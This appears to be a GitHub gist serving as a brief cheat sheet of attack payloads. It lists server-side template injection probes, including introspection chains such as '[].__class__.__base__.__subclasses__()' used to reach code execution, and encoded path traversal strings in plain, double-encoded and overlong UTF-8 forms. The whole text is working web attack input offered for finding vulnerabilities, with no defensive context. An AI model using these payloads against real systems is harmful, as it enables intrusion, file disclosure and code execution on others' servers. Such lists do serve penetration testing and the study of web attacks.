Skip to content

Instantly share code, notes, and snippets.

@belakor999
belakor999 / ssti.txt
Created March 19, 2025 23:57
SSTI vulnerability
SSTI vulnerability finding attack vector
Generic
{7*7}
{{ '7'*7 }}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{% for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ [].__class__.__base__.__subclasses__() }}
Encoded Traversal Strings:
../
%2e%2e%2f
%252e%252e%252f
%uff0e%uff0e%u2215
%c0%ae%c0%ae%c0%af
..\